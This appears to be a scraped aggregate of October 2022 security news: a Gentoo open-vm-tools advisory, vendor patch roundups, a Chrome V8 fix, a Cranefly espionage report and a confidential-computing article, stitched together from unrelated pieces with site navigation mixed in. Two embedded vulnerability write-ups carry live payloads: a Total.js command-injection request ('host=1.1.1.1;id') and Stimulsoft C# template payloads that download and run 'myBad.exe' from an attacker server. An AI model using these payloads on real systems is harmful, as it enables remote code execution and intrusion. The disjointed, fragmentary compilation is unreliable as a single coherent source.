Gentoo Linux Security Advisory 202210-27 - A vulnerability has been discovered in open-vm-tools which could allow for local privilege escalation. Versions less than 12.1.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202210-27  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: open-vm-tools: Local Privilege Escalation  
     Date: October 31, 2022  
     Bugs: #866227  
       ID: 202210-27

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in open-vm-tools which could allow  
for local privilege escalation.

Background  
==========

open-vm-tools contains tools for VMware guests.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  app-emulation/open-vm-tools  < 12.1.0                  >= 12.1.0

Description  
===========

A pipe accessible to unprivileged users in the VMWare guest does not  
sufficiently sanitize input.

Impact  
======

An unprivileged guest user could achieve root privileges within the  
guest.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All open-vm-tools users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-emulation/open-vm-tools-12.1.0"

References  
==========

[ 1 ] CVE-2022-31676  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31676  
[ 2 ] VMSA-2022-0024.1

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202210-27

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202210-27

Categories: News
Tags: week in security

Tags:  weekly blog roundup

The most important and interesting computer security stories from the last week.



(Read more...)




The post A week in security (October 24 - 30) appeared first on Malwarebytes Labs.

twitter

facebook

linkedin

Youtube

instagram

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

VPN Connection

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (October 24 - 30)

Plus: Important patches from Apple, VMWare, Cisco, Zimbra, SAP, and Oracle.

Other issues fixed in October are a heap buffer overflow in WebSQL tracked as CVE-2022-3446 and a use-after-free bug in Permissions API tracked as CVE-2022-3448, Google wrote in its blog. Google also fixed two use-after-free bugs in Safe Browsing and in Peer Connection.

Google Android

The Android Security Bulletin for October includes fixes for 15 flaws in the Framework and System and 33 issues in the kernel and vendor components. One of the most concerning issues is a critical security vulnerability in the Framework component that could lead to local escalation of privilege, tracked as CVE-2022-20419. Meanwhile, a flaw in the Kernel could also lead to local escalation of privilege with no additional execution privileges needed.

None of the issues are known to have been used in attacks, but it still makes sense to check your device and update it when you can. Google has issued the update to its Pixel devices and it’s also available for the Samsung Galaxy S21 and S22 series smartphones and Galaxy S21 FE.

Cisco

Cisco has urged companies to patch two flaws in its AnyConnect Secure Mobility Client for Windows after it was confirmed the vulnerabilities are being used in attacks. Tracked as CVE-2020-3433, the first could allow an attacker with valid credentials on Windows to execute code on the affected machine with system privileges.

Meanwhile, CVE-2020-3153 could allow an attacker with valid Windows credentials to copy malicious files to arbitrary locations with system-level privileges.

The US Cybersecurity and Infrastructure Security Agency has added the Cisco flaws to its already exploited vulnerabilities catalog.

While both the Cisco flaws require the attacker to be authenticated, it’s still important to update now.

Zoom

Video conferencing service Zoom patched several issues in October, including a flaw in its Zoom client for meetings, which is marked as having a high severity with a CVSS Score of 8.8. Zoom says versions before version 5.12.2 are susceptible to a URL-parsing vulnerability tracked as CVE-2022-28763.

“If a malicious Zoom meeting URL is opened, the link may direct the user to connect to an arbitrary network address, leading to additional attacks including session takeovers,” Zoom said in a security bulletin.

Earlier in the month, Zoom alerted users that its client for meetings for macOS starting with 5.10.6 and prior to 5.12.0 contained a debugging port misconfiguration.

VMWare

Software giant VMWare has patched a serious vulnerability in its Cloud Foundation

Tracked as CVE-2021-39144. The remote code execution vulnerability via XStream open source library is rated as having a critical severity with a maximum CVSSv3 base score of 9.8. “Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation, a malicious actor can get remote code execution in the context of 'root' on the appliance,” VMWare said in an advisory.

The VMware Cloud Foundation update also addresses an XML External Entity vulnerability with a lesser CVSSv3 base score of 5.3. Tracked as CVE-2022-31678, the bug could allow an unauthenticated user to perform denial of service.

Zimbra

Software firm Zimbra has issued patches to fix an already-exploited code execution flaw that could allow an attacker to access user accounts. The issue, tracked as CVE-2022-41352, has a CVSS severity score of 9.8.

Exploitation was spotted by Rapid7 researchers, who identified signs it had been used in attacks. Zimbra initially released a workaround to fix it, but now the patch is available, you should apply it ASAP.

SAP

Enterprise software firm SAP has published 23 new and updated Security Notes in its October Patch Day. Among the most serious issues is a critical Path Traversal vulnerability in SAP Manufacturing Execution. The vulnerability affects two plugins: Work Instruction Viewer and Visual Test and Repair and has a CVSS score of 9.9.

Another issue with a CVSS score of 9.6 is an account hijacking vulnerability in the SAP Commerce login page.

Oracle

Software giant Oracle has released a whopping 370 patches as part of its quarterly security update. Oracle’s Critical Patch Update for October fixes 50 vulnerabilities rated as critical.

The update contains 37 new security patches for Oracle MySQL, 11 of which may be remotely exploitable without authentication. It also contains 24 new security patches for Oracle Financial Services Applications, 16 of which may be remotely exploitable without authentication.

Due to “the threat posed by a successful attack,” Oracle “strongly recommends” that customers apply Critical Patch Update security patches as soon as possible.

You Need to Update Google Chrome, Windows, and Zoom Right Now

In Total.js 4 before 0e5ace7, /api/common/ping can achieve remote command execution via shell metacharacters in the host parameter.

Using the API /api/common/ping it's possible to achieve remote command execution on the host machine. This leads to complete control over the machine hosting the server.

    POST /api/common/ping HTTP/1.1
    Host: 0.0.0.0:8000
    User-Agent: bla-bla-bla
    Cookie: your-auth-cookie
    Content-Length: 15
    
    host=1.1.1.1;id
    

	schema.addWorkflow('ping', function($) {
		var host \= $.model.host.replace(/'|"|\\n/g, '');
		Exec('ping -c 3 {0}'.format(host), $.done(true));
	});

Here the problem is the fact that the server doesn't sanitize correctly the input checking that the host provided is a legitimate one, allowing also characters like ;, | or &.

CVE-2022-44019: [Security] Remote command execution · Issue #12 · totaljs/code

Stimulsoft (aka Stimulsoft Reports) 2013.1.1600.0, when Compilation Mode is used, allows an attacker to execute arbitrary C# code on any machine that renders a report, including the application server or a user's local machine, as demonstrated by System.Diagnostics.Process.Start.

Similar to CVE-2020-15865. However, this one was a little trickier because I could only execute chained C# commands that ultimately return an Object. This is a technique that can be used anywhere where user input is compiled by design, such as in template injection. In fact, hackers I've shared this story with had success using the concept across different languages and systems.

**Information Disclosure to RCE** 

This started with a low severity issue - a verbose error message from the application when I typed SQL junk into the Report Editor, looking for a SQL injection. The errors contained CS1503 (C# compilation errors) returned from Stimulsoft Reports 2013.1.1600.0, so I was confident there was an RCE available: 

So, after trying a few C# commands, I eventually I got errors like:

 C:\\User\\burninator\\AppData\\Local\\Temp\\klqskh4k.0.cs(578,74): error CS1502: The best overloaded method match for '\*\*\*\*.ToString(object,object,bool)' has some invalid arguments: error CS1503: Argument 2: cannot convert from method group' to 'object' 

Bingo! I love to hear that something is being converted, and in a function we apparently have control over. This error is a wonderful window into how this works. I can tell from the error that it will only compile and execute successfully if we give it something that it can interpret as an Object. I tested this by sending {new Object()}, and it compiled without error! These work too but they're not that helpful (yet): 

{new System.Diagnostics.Process()}

{System.Math.Ceiling} 

{new System.Diagnostics.StackTrace(true).GetFrame(1).GetMethod()}

So, how can I weaponize this? Since this is a local thick client application, the first step is to figure out if it's going to execute these commands locally or on the application web server it's connected to. Surprise! It actually does both, since I was able to chain this with other functionality to make it launch server side AND locally. But first let's find proof that we can inject a malicious command... 

To find out, I read the manual. I actually READ the manual for the C# language. I know, I know. Disgusting. It's a taboo I didn't even do and would never have done when I was a developer. But it was important here, because I needed to find attack chains that would let me: 

1.)  execute a command on the local machine (pop calc.exe) 

2.) execute a command locally to make the remote server do an external DNS hit POC and then make it download/write/execute the file  

It reminded me a lot of Object Deserialization gadget/widget chains in YsoSerial, which are well known internal commands or system objects that aid with command injection and execution (i.e.http://gursevkalra.blogspot.com/2016/01/ysoserial-commonscollections1-exploit.html ). But given my constraints, I had to create my own. If you aren't familiar with Objects in Object Oriented Programming languages, here's a quick rundown from my presentation on Object Attacks and how I used them in this context. The class definitions are from the C# manual:

 

{System.IO.File.ReadAllText(@"dontlook.txt")} 

(NOTE: the curly brackets are for the templating system, they're not valid C#)  

 

{System.Net.WebRequest.Create("https://ATTACKSERVER:8000/myBad.exe").GetResponse().GetResponseStream()}  

 

{System.Diagnostics.Process.Start("myBad.exe")}  

That's how I got one of the weirdest shells ever.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42777  

Also, now that I've written this out, I realize that by far the least fun part of this exploit was reading the C# manual to find interesting File IO and Networking gadget chains that return Objects... it was a lot of 2am nights. So I think I will end up automating that process, if something like it doesn't already exist.

CVE-2021-42777: Reporting Library RCE (Object Chaining) - CVE-2021-42777

Plus: The New York Post gets hacked, a huge stalkerware network is exposed, and the US claims China interfered with its Huawei probe.

For years, AlphaBay ruled the dark web. If you were in the market to buy drugs or stolen credit cards, the digital bazaar was the place to turn. At its peak, more than 350,000 products were listed for sale—an estimated 10 times the size of the notorious Silk Road market—and the website proved to be the ire of law enforcement the world round. That was until cops took AlphaBay offline in 2017.

This week, WIRED published the first in a six-part series detailing the hunt for Alpha02, the mastermind believed to be behind AlphaBay, and the huge international takedown operation that wiped the marketplace from the web. Each week, we’ll publish a new part of the series, excerpted from WIRED reporter Andy Greenberg’s new book, _Tracers in the Dark_.

Schools across the US have faced dozens of hoax calls about mass shootings in recent months. After a call is made, police scramble to the scene fearing the worst, only to find out there is no shooter. Now hoax phone call recordings obtained by WIRED and conversations with law enforcement officials reveal how the calls have been made and show that law enforcement officials are closing in on the alleged hoaxer. Police are looking for a male “with a heavy accent described as Middle Eastern or African” and have linked the phone calls to Ethiopia.

Elsewhere, a bug in Apple’s new macOS 13 Ventura operating system is causing problems for malware scanners and security monitoring tools. With the new software update, Apple accidentally crippled third-party security products in a way users may not notice. The company is planning to fix the bug in an upcoming software release.

We also looked at a newly discovered Chinese influence operation that is targeting US elections—although it is not having much success. And now that Elon Musk owns Twitter, here’s how you should think about your privacy and security on the bird website.

But wait, there’s more! Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

Officials in Canada and the Netherlands are investigating allegations that Chinese police forces have operated a network of illegal police stations within their countries. According to reports that emerged this week, Chinese police forces have been operating out of clandestine bases and using their presence to track and threaten dissidents. The Dutch government has called such sites “illegal” and said it is “investigating exactly what they are doing here,” while officials in Canada said they are investigating “so-called ‘police’ stations.”

However, it is just the tip of the iceberg. Spanish civil rights group Safeguard Defenders first claimed that Chinese police forces from the cities of Fuzhou and Qingtian were running “overseas police service stations” across the West in a report published in September. Since 2018, the group claims, more than 38 police service stations have appeared in “dozens of countries” spread across five different continents. “Such overseas police ‘service stations’ have been used by police back in China to carry out such ‘persuasion to return’ operations on foreign soil, including in Europe,” the report states. Lawmakers in both England and Scotland are also planning on investigating the stations, reports say.

Chinese officials have not denied the existence of the service stations, but say they exist to provide bureaucratic services to Chinese citizens and don’t involve police operations. The Chinese embassy in Canada said the stations exist to allow Chinese citizens to complete tasks such as renewing their driving licenses: “The main purpose of the service station abroad is to provide free assistance to overseas Chinese citizens in this regard.”

If stalkerware is installed on your phone or laptop, the malicious software can send every tap, message, and photo back to the person who added it to your device. The software is often hard to find, and the insidious industry that creates it operates in the shadows. This week, a TechCrunch investigation revealed how a huge stalkerware network, with hundreds of thousands of victims, operates.

Leaked data obtained by TechCrunch shows TheTruthSpy stalkerware has been installed on more than 300,000 devices and has victims all around the world. Over a six-week period analyzed by the publication, more than 9,400 new devices were infected with the stalkerware. Thousands of calls, millions of text messages, and more than 470,000 photos and videos were collected by the app without its victims’ knowledge. And data was also likely collected from the phones of children. This tool can tell if your device was compromised.

A pair of Chinese intelligence officers attempted to bribe a US official involved in the criminal case against Huawei, the US Department of Justice claimed this week. Across three separate cases, the Justice Department charged 13 people with alleged efforts to “exert influence” in the US on behalf of the People’s Republic of China. The charges range from trying to disrupt the US government’s Huawei investigation to trying to recruit people as intelligence agents. Two people were also arrested for allegedly attempting to “cause the forced repatriation” of a Chinese national living in the US. “The actions announced today take place against a backdrop of malign activity from the government of the People’s Republic of China that includes espionage, attempts to disrupt our justice system, harassment of individuals, and ongoing efforts to steal sensitive US technology,” deputy attorney general Lisa O. Monaco said in a statement. In an unprecedented move in July, the head of the FBI and the UK’s MI5 made a joint public appearance to warn about the perceived threat from China, saying the nation is the biggest threat to economic and national security.

The website and Twitter account of the _New York Post_ were hacked this week. On Thursday, the publication’s Twitter account started sharing links to stories with offensive headlines and posts about politicians. US president Joe Biden, US representative Alexandria Ocasio-Cortez, and New York governor Kathy Hochul were all targeted. The _Post_, which is owned by News Corp, tweeted that it was investigating the incident, but very few details have been made public so far. In February this year, News Corp announced it had been hacked, with the attackers believed to have accessed journalists’ emails. The latest attack against the _Post_ echoes a recent hack of the business news website _Fast Company_. In September, the publication’s content management system (CMS) was breached and the attacker sent offensive push notifications to Apple News subscribers.

China Operates Secret ‘Police Stations’ in Other Countries

Categories: Exploits and vulnerabilities
Categories: News
Google has issued an update for Chrome to fix an issue in the V8 JavaScript engine



(Read more...)




The post A Chrome fix for an in-the-wild exploit is out—Check your version appeared first on Malwarebytes Labs.

Google has announced an update for Chrome that fixes an in-the-wild exploit. Chrome Stable channel has been updated to 107.0.5304.87 for Mac and Linux, and 107.0.5304.87/.88 for Windows.

The vulnerability at hand is described as a type confusion issue in the V8 Javascript engine.

**Mitigation**

If you’re a Chrome user on Windows, Mac, or Linux, you should update as soon as possible. Most of the time, the easiest way to update Chrome is to do nothing—it should update itself automatically, using the same method as outlined below but without your involvement. However, if something goes wrong—such as an extension blocking the update—or if you never close your browser, you can end up lagging behind on your updates.

So, it doesn’t hurt to check now and again. And now would be a good time, given the severity of the vulnerabilities in this batch.

My preferred method is to have Chrome open the page chrome://settings/help, which you can also find by clicking **Settings > About Chrome**.

Updating Chrome

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete.

Chrome is up to date

After the update the version should be 107.0.5304.87 or later.

**CVE-2022-3723**

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).

This is the one that urged the out of bounds update was CVE-2022-3723, a type confusion issue with Chrome's V8 JavaScript engine. A remote attacker could exploit this vulnerability to trigger data manipulation on the targeted system.

Type confusion is possible when a piece of code doesn’t verify the type of object that is passed to it. The program allocates or initializes an object using one type, but it later accesses it using a type that is incompatible with the original. Details about the vulnerability will not be released before everyone has had a chance to update, but it seems that in this case the manipulation with an unknown input can lead to privilege escalation.

The V8 engine is a very important component within Chrome that's used to process JavaScript commands. A very similar vulnerability was found in March of 2022. This was also a type confusion issue in the V8 engine, which turned out to affect other Chromium based browsers as well. So keep an eye out for updates on any other Chromium based browser you may be using, such as Edge.

A Chrome fix for an in-the-wild exploit is out—Check your version

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 21 and Oct. 28. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for October 21 to October 28

The threat actor uses commands from legitimate IIS logs to communicate with custom tools in a savvy bid to hide traces of its activity on victim machines.

Hacking group Cranefly is using the new technique of using Internet Information Services (IIS) commands to deliver backdoors to targets and carry out intelligence-gathering campaigns.

Researchers at Symantec have observed a previously undocumented dropper Trojan called Geppei being used to install backdoors (including Danfuan and Regeorg) and other custom tools on SAN arrays, load balancers, and wireless access point (WAP) controllers that may lack appropriate security tools, according to a blog post on Oct. 28.

In examining the activity, the team noticed that Cranefly is using ISS logs to communicate with Geppei.

"The technique of reading commands from IIS logs is not something Symantec researchers have seen being used to date in real-world attacks, making it novel," Brigid O Gorman, senior intelligence analyst on Symantec’s Threat Hunter team, tells Dark Reading. "It is a clever way for the attacker to send commands to its dropper."

ISS logs record data such as webpages visited and apps used. The Cranefly attackers are sending commands to a compromised Web server by disguising them as Web access requests; IIS logs them as normal traffic, but the dropper can read them as commands, if they contain the strings Wrde, Exco, or Cllo, which don't normally appear in IIS log files.

"These appear to be used for malicious HTTP request parsing by Geppei — the presence of these strings prompts the dropper to carry out activity on a machine," Gorman notes. "It is a very stealthy way for attackers to send these commands."

The commands contain malicious encoded .ashx files, and these files are saved to an arbitrary folder determined by the command parameter and they run as backdoors (i.e., ReGeorg or Danfuan).

Gorman explains that the technique of reading commands from IIS logs could in theory be used to deliver different types of malware if leveraged by threat actors with different goals.

"In this instance, the attackers leveraging it are interested in intelligence gathering and delivering backdoors, but that doesn't mean this technique couldn't be used to deliver other types of threats in the future," she says.

In this case, to date, the Symantec threat team has found evidence of attacks against just a handful of victims.

"That is not unusual for groups focused on espionage, as these attacks tend to be focused on a small number of selected victims," Gorman explains.

**Cranefly: A Threat of Reasonable Sophistication**

Gorman explains that the development of custom malware and new techniques requires a certain level of skills and resources that not all threat actors have.

"It implies that those behind Cranefly have a certain level of skills that makes them capable of carrying out stealthy and innovative cyberattacks," she says, noting the gang also takes steps to cover up its activity on victim machines.

The dropped malicious backdoors are removed from victim machines if the Wrde command is called with a specific option ("r").

"A step like that displays quite a high level of operational security by the group," she adds.

**Deploying an In-Depth Defense Strategy**

Gorman says that the typical rules apply to defending against Cranefly as they do when it comes to most types of cyberattacks: Organizations should adopt a defense-in-depth strategy, using multiple detection, protection, and hardening technologies to mitigate risk at each point of a potential attack chain.

"Organizations should also be aware of and monitor the use of dual-use tools inside their network," she says, noting that Symantec would also advise implementing proper audit and control of administrative account usage.

"We'd also suggest creating profiles of usage for admin tools as many of these tools are used by attackers to move laterally undetected through a network," she says. "Across the board, multifactor authentication (MFA) can help limit the usefulness of compromised credentials."

Cranefly Cyberspy Group Spawns Unique ISS Technique

New technologies designed into processors allow enterprises to leverage cloud advantages while meeting privacy regulations.

Data security in the public cloud has been a concern since the computing medium emerged in the mid-2000s, but cloud providers are allaying fears of theft with a new concept: confidential computing.

Confidential computing involves creating an isolated vault on hardware — also called a trusted execution environment — in which encrypted code is protected and stored. The code is accessible only to applications with the right keys, which are usually a combination of numbers, to unlock and then decrypt it. A process called attestation verifies all is correct, minimizing the chances of unauthorized parties stealing or pilfering the data.

Confidential computing offers the "ultimate in data protection," said Mark Russinovich, chief technology officer at Microsoft Azure, during a streamed session at the company's Ignite conference in October.

"Because it is inside the enclave, protected by hardware, nothing outside can see that data or tamper with it," he said. "That includes people with physical access to the server, the server administrator, the hypervisor, and the administrator of an application."

Confidential computing allows companies to migrate workloads that rely heavily on data privacy and security to the cloud, analysts say. Companies in highly regulated industries like healthcare and finance can move to cloud services while maintaining their security posture.

**Spying the Holes in the Clouds**

Since its early days, the utilitarian appeal of cloud computing, in terms of pricing and flexibility, largely drowned security concerns. The most vocal criticism of cloud computing was the prospect of privacy being impossible to ensure because guest workloads could not be completely isolated from the host system, says James Sanders, principal analyst for cloud, infrastructure, and quantum computing at technology research firm CCS Insight.

"However, the disclosure of the Spectre and Meltdown vulnerabilities in 2018 demonstrated the potential for a malicious cloud tenant to exfiltrate data from the workloads of other processes on the same host system," Sanders says.

The vulnerabilities exposed to hackers confidential information leaving secure enclaves. The twin attacks also pushed along the wider idea of confidential computing, in which encrypted code was accessible to only authorized parties but would not leave isolated enclaves.

Confidential computing prevents bad guys from breaking into servers and stealing secrets, says Steve Leibson, principal analyst at Tirias Research.

"The state-sponsored \[attacks\] are the most difficult and the most sophisticated," he says. "So at this point you really have to think about protecting data in use, in motion, and stored. It must be encrypted in all three situations."

**Grounding Confidential Computing in Silicon**

Confidential computing is changing the way hardware makers and cloud providers think about applications on virtual machines and not directly on processors, Leibson says.

"When we ran on processors, we didn't need attestation because nobody was going to alter a Xeon," he says. "But a virtual machine — that's just software. You can alter it. Attestation is trying to provide the same sort of rigidity to software machines as silicon does for hardware processors."

Chip makers have since taken a security-first approach in chip design, and it has trickled down to cloud offerings. Last month Google, Nvidia, Microsoft, and AMD jointly announced a specification called Caliptra to establish a secure layer on chips where the data can be protected and trusted. The specification protects the boot sector, provides attestation layers, and safeguards against conventional hardware hacking, such as glitching and side-channel attacks. Caliptra is managed by the Open Compute Project and Linux Foundation.

"We are looking ahead to future innovations in confidential computing and varied use cases that require chip-level attestation at the level of a package or system on a chip (SoC)" with Caliptra, wrote Parthasarathy Ranganathan, vice president and technical fellow at Google, in a blog entry posted during the Google Cloud Next event that took place in mid-October.

Google already has its own confidential computing technology called OpenTitan, which is mainly focused on protecting the boot sector.

Microsoft's previous efforts at confidential computing relied on partial enclaves rather than protecting the entire host system, CCS Insight's Sanders says. However, this month the company announced Azure virtual machines with confidential computing based on technology baked into Epyc, a server processor from AMD. AMD's SNP-SEV encrypts data when it is loaded into a CPU or GPU, which protects data while being processed.

**Clearing the Way to Real-World Compliance**

For enterprises, confidential computing offers an ability to secure data in the public cloud as required by regulations like Europe's General Data Protection Regulation and the United States' Health Insurance Portability and Accountability Act, analysts say.

"Availability of administrator-proof encryption in the cloud undercuts one of the longest-serving anti-cloud talking points, since shielding workloads from the cloud platform operator effectively eliminates the largest remaining source of risk preventing adoption of public cloud," Sanders says.

The AMD technology appeared in general-purpose virtual machines earlier this year, but the announcements at Ignite extends the technology to Azure Kubernetes Service, which provides additional security for cloud-native workloads. The AMD technology on Azure is also designed for use in bring-your-own-device workplaces, remote work, and graphics-intensive applications.

Tag

#mac